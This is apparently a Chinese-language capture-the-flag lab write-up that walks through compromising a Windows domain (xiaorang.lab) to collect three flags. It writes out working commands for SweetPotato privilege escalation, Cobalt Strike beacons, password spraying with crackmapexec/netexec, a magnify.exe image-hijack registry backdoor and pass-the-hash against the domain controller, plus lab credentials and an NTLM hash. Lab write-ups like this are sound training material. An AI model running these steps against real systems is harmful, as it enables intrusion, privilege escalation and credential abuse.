flag1

image-20260616170840438

fscan扫描出可利用的信息

使用MDUT进行连接

image-20260616170847538

image-20260616170856847

这里SeImpersonatePrivilege 身份验证后模拟客户端 已启用可以使用sweetpotato进行提权

尝试上线cs

image-20260616170906959

上线成功,接着进行提权

image-20260616170913781

然后我们看看flag 在哪里,这里找就有点麻烦了,我们可以将system上线

在MDUT执行命令

1
shell C:\Users\Public\SweetPotato.exe -a C:\Users\Public\artifact_x64.exe

image-20260616170923597

上线成功

image-20260616170930979

image-20260616170939637

得到flag

1
flag{4f89fd8a-ce68-4d65-821a-778b52fe742c}

flag2

image-20260616170950401让我们注重用户会话

查看在线用户

1
shell quser || qwinst

image-20260616170957842

可以使用cs注入进程上线

image-20260616171004723

image-20260616171013254

点击注入,上线成功

image-20260616171020768

查看共享资源

1
shell net use

image-20260616171029340

image-20260616171037839

查看目录

image-20260616171046386

给出账号密码,并且提示是映像劫持

1
xiaorang.lab\Aldrich:Ald@rLMWuy7Z!#

使用fscan扫描,因为有乱码,然后输出到文件中,还是有点问题,不太好看,用ai分析了一下,具体为下

image-20260616171055483

1
2
3
4
172.22.8.18 WIN-WEB 
172.22.8.15 DC:XIAORANG\DC01
172.22.8.31 XIAORANG\WIN19-CLIENT
172.22.8.46  WIN2016.xiaorang.lab

也可以先做内网穿透然后使用fscan扫描这样就可以没有乱码了
先做好代理,直接使用cs的插件行。
image.png

接下来是喷洒密码,修改密码
proxychains crackmapexec smb 172.22.8.1/24 -u Aldrich -p 'Ald@rLMWuy7Z!#' -d xiaorang.lab 2>/dev/null
proxychains4 netexec smb 172.22.8.1/24 -u Aldrich -p 'Ald@rLMWuy7Z!#' -d xiaorang.lab -t 5
这两个都可以
修改密码:
可以先尝试远程桌面登录其他的ip例如31,然后改个密码,在登录46,因为只有46可以连接
proxychains4 rdesktop 172.22.8.46 -u Aldrich -d xiaorang.lab -p 'Admin@123' -r disk:share=/home/kali/Desktop/tmp
image.png

镜像映射的提权方法:
映像劫持的几种利用方式 - FreeBuf网络安全行业门户
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
锁定之后点击放大镜,然后可以看到system权限
image.png
然后拿flag
image.png

flag3

因为46是不出网的
所以要利用cs做个中转,然后在上线cs
image.png
查看域管理成员
image.png
抓取密码
image.png
最后使用pth来打15获得flag3
proxychains4 nxc smb 172.22.8.15 -u 'WIN2016$' -H d3e2865f74e9fdda037f4f071b2635a1 -d xiaorang -x "type C:\Users\Administrator\flag\flag03.txt"
image.png